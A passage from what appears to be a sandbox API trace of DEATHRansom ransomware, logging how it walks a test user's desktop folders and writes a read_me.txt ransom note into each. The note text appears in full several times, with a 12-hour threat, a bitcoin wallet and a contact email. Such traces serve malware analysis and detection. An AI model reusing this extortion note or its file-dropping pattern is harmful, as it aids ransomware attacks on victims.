dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nBTFhev2dXS.mp3", cAlternateFileName="NBTFHE~1.MP3")) returned 1 [0073.916] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\nBTFhev2dXS.mp3") returned 115 [0073.916] FindNextFileW (in: hFindFile=0x2b2778, lpFindFileData=0x17d4a0 | out: lpFindFileData=0x17d4a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82ac3920, ftCreationTime.dwHighDateTime=0x1d4d12f, ftLastAccessTime.dwLowDateTime=0x54cb54e0, ftLastAccessTime.dwHighDateTime=0x1d4d144, ftLastWriteTime.dwLowDateTime=0x54cb54e0, ftLastWriteTime.dwHighDateTime=0x1d4d144, nFileSizeHigh=0x0, nFileSizeLow=0x6439, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nBTFhev2dXS.mp3", cAlternateFileName="NBTFHE~1.MP3")) returned 0 [0073.916] FindClose (in: hFindFile=0x2b2778 | out: hFindFile=0x2b2778) returned 1 [0073.916] wnsprintfW (in: pszDest=0x8af10e0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\read_me.txt") returned 111 [0073.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\vpe92_uurvfymiy\\5q 1\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7bc [0073.917] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.917] WriteFile (in: hFile=0x7bc, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d704, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17d704*=0x6b3, lpOverlapped=0x0) returned 1 [0073.918] CloseHandle (hObject=0x7bc) returned 1 [0073.918] GetProcessHeap () returned 0x280000 [0073.918] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8af10e0 | out: hHeap=0x280000) returned 1 [0073.918] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x17d718 | out: lpFindFileData=0x17d718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c94730, ftCreationTime.dwHighDateTime=0x1d4c563, ftLastAccessTime.dwLowDateTime=0xd28bebd0, ftLastAccessTime.dwHighDateTime=0x1d4cd50, ftLastWriteTime.dwLowDateTime=0xd28bebd0, ftLastWriteTime.dwHighDateTime=0x1d4cd50, nFileSizeHigh=0x0, nFileSizeLow=0xc62b, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="gYB5HFNX.flv", cAlternateFileName="")) returned 1 [0073.918] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\gYB5HFNX.flv") returned 107 [0073.918] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x17d718 | out: lpFindFileData=0x17d718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x298377a0, ftCreationTime.dwHighDateTime=0x1d4c6bc, ftLastAccessTime.dwLowDateTime=0x764921c0, ftLastAccessTime.dwHighDateTime=0x1d4c8bf, ftLastWriteTime.dwLowDateTime=0x764921c0, ftLastWriteTime.dwHighDateTime=0x1d4c8bf, nFileSizeHigh=0x0, nFileSizeLow=0x1655e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="psApFJEI4E87T.png", cAlternateFileName="PSAPFJ~1.PNG")) returned 1 [0073.918] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\psApFJEI4E87T.png") returned 112 [0073.918] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x17d718 | out: lpFindFileData=0x17d718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x298377a0, ftCreationTime.dwHighDateTime=0x1d4c6bc, ftLastAccessTime.dwLowDateTime=0x764921c0, ftLastAccessTime.dwHighDateTime=0x1d4c8bf, ftLastWriteTime.dwLowDateTime=0x764921c0, ftLastWriteTime.dwHighDateTime=0x1d4c8bf, nFileSizeHigh=0x0, nFileSizeLow=0x1655e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="psApFJEI4E87T.png", cAlternateFileName="PSAPFJ~1.PNG")) returned 0 [0073.918] FindClose (in: hFindFile=0x2b2738 | out: hFindFile=0x2b2738) returned 1 [0073.918] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\read_me.txt") returned 106 [0073.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\vpe92_uurvfymiy\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.918] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.919] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d97c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17d97c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.919] CloseHandle (hObject=0x7a8) returned 1 [0073.920] GetProcessHeap () returned 0x280000 [0073.920] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ad00c8 | out: hHeap=0x280000) returned 1 [0073.920] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41060870, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0x2dc20e0, ftLastAccessTime.dwHighDateTime=0x1d4c732, ftLastWriteTime.dwLowDateTime=0x2dc20e0, ftLastWriteTime.dwHighDateTime=0x1d4c732, nFileSizeHigh=0x0, nFileSizeLow=0x15c22, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ymfW8vhK.swf", cAlternateFileName="")) returned 1 [0073.920] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\ymfW8vhK.swf") returned 91 [0073.920] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41060870, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0x2dc20e0, ftLastAccessTime.dwHighDateTime=0x1d4c732, ftLastWriteTime.dwLowDateTime=0x2dc20e0, ftLastWriteTime.dwHighDateTime=0x1d4c732, nFileSizeHigh=0x0, nFileSizeLow=0x15c22, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ymfW8vhK.swf", cAlternateFileName="")) returned 0 [0073.920] FindClose (in: hFindFile=0x2b26f8 | out: hFindFile=0x2b26f8) returned 1 [0073.920] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\read_me.txt") returned 90 [0073.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0073.920] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.920] WriteFile (in: hFile=0x7a4, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dbf4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17dbf4*=0x6b3, lpOverlapped=0x0) returned 1 [0073.921] CloseHandle (hObject=0x7a4) returned 1 [0073.921] GetProcessHeap () returned 0x280000 [0073.921] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ab00b8 | out: hHeap=0x280000) returned 1 [0073.921] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a75aeb0, ftCreationTime.dwHighDateTime=0x1d4caac, ftLastAccessTime.dwLowDateTime=0x920506a0, ftLastAccessTime.dwHighDateTime=0x1d4c995, ftLastWriteTime.dwLowDateTime=0x920506a0, ftLastWriteTime.dwHighDateTime=0x1d4c995, nFileSizeHigh=0x0, nFileSizeLow=0x4b8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PDFNvUZaxs.mkv", cAlternateFileName="PDFNVU~1.MKV")) returned 1 [0073.922] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\PDFNvUZaxs.mkv") returned 72 [0073.922] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70181af0, ftCreationTime.dwHighDateTime=0x1d4cc8d, ftLastAccessTime.dwLowDateTime=0xbd87a3b0, ftLastAccessTime.dwHighDateTime=0x1d4cd5e, ftLastWriteTime.dwLowDateTime=0xbd87a3b0, ftLastWriteTime.dwHighDateTime=0x1d4cd5e, nFileSizeHigh=0x0, nFileSizeLow=0x4f18, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="UnlHsF.mp3", cAlternateFileName="")) returned 1 [0073.922] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\UnlHsF.mp3") returned 68 [0073.922] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70181af0, ftCreationTime.dwHighDateTime=0x1d4cc8d, ftLastAccessTime.dwLowDateTime=0xbd87a3b0, ftLastAccessTime.dwHighDateTime=0x1d4cd5e, ftLastWriteTime.dwLowDateTime=0xbd87a3b0, ftLastWriteTime.dwHighDateTime=0x1d4cd5e, nFileSizeHigh=0x0, nFileSizeLow=0x4f18, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="UnlHsF.mp3", cAlternateFileName="")) returned 0 [0073.922] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0073.922] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\read_me.txt") returned 69 [0073.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.941] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.942] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17de6c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17de6c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.951] CloseHandle (hObject=0x7a8) returned 1 [0073.951] GetProcessHeap () returned 0x280000 [0073.951] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b60028 | out: hHeap=0x280000) returned 1 [0073.954] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11127da0, ftCreationTime.dwHighDateTime=0x1d4ca3c, ftLastAccessTime.dwLowDateTime=0x155f13f0, ftLastAccessTime.dwHighDateTime=0x1d4c6e5, ftLastWriteTime.dwLowDateTime=0x155f13f0, ftLastWriteTime.dwHighDateTime=0x1d4c6e5, nFileSizeHigh=0x0, nFileSizeLow=0x17c6f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bCgEZVX9L9jQz2qWVKNz.gif", cAlternateFileName="BCGEZV~1.GIF")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bCgEZVX9L9jQz2qWVKNz.gif") returned 66 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44cf8ae0, ftCreationTime.dwHighDateTime=0x1d4cebd, ftLastAccessTime.dwLowDateTime=0x95068550, ftLastAccessTime.dwHighDateTime=0x1d4c5fc, ftLastWriteTime.dwLowDateTime=0x95068550, ftLastWriteTime.dwHighDateTime=0x1d4c5fc, nFileSizeHigh=0x0, nFileSizeLow=0x18f23, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="em--siXz NglZ-An.png", cAlternateFileName="EM--SI~1.PNG")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\em--siXz NglZ-An.png") returned 62 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x961be860, ftCreationTime.dwHighDateTime=0x1d4d45f, ftLastAccessTime.dwLowDateTime=0x1c02e830, ftLastAccessTime.dwHighDateTime=0x1d4d31a, ftLastWriteTime.dwLowDateTime=0x1c02e830, ftLastWriteTime.dwHighDateTime=0x1d4d31a, nFileSizeHigh=0x0, nFileSizeLow=0x8cf8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="FsOU4o0hMFpPBRbA.doc", cAlternateFileName="FSOU4O~1.DOC")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FsOU4o0hMFpPBRbA.doc") returned 62 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb0cc10, ftCreationTime.dwHighDateTime=0x1d4ca71, ftLastAccessTime.dwLowDateTime=0xe439100, ftLastAccessTime.dwHighDateTime=0x1d4cd6f, ftLastWriteTime.dwLowDateTime=0xe439100, ftLastWriteTime.dwHighDateTime=0x1d4cd6f, nFileSizeHigh=0x0, nFileSizeLow=0xac3c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="HfYjszBjyIVWutWh.gif", cAlternateFileName="HFYJSZ~1.GIF")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HfYjszBjyIVWutWh.gif") returned 62 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f72ac0, ftCreationTime.dwHighDateTime=0x1d4c59e, ftLastAccessTime.dwLowDateTime=0xf50f0f40, ftLastAccessTime.dwHighDateTime=0x1d4cdd5, ftLastWriteTime.dwLowDateTime=0xf50f0f40, ftLastWriteTime.dwHighDateTime=0x1d4cdd5, nFileSizeHigh=0x0, nFileSizeLow=0x14cc9, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="jGcvWPRC.csv", cAlternateFileName="")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jGcvWPRC.csv") returned 54 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713bc110, ftCreationTime.dwHighDateTime=0x1d4cfc7, ftLastAccessTime.dwLowDateTime=0xdc51c620, ftLastAccessTime.dwHighDateTime=0x1d4c635, ftLastWriteTime.dwLowDateTime=0xdc51c620, ftLastWriteTime.dwHighDateTime=0x1d4c635, nFileSizeHigh=0x0, nFileSizeLow=0xce90, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="liVQHjNX2r.swf", cAlternateFileName="LIVQHJ~1.SWF")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, 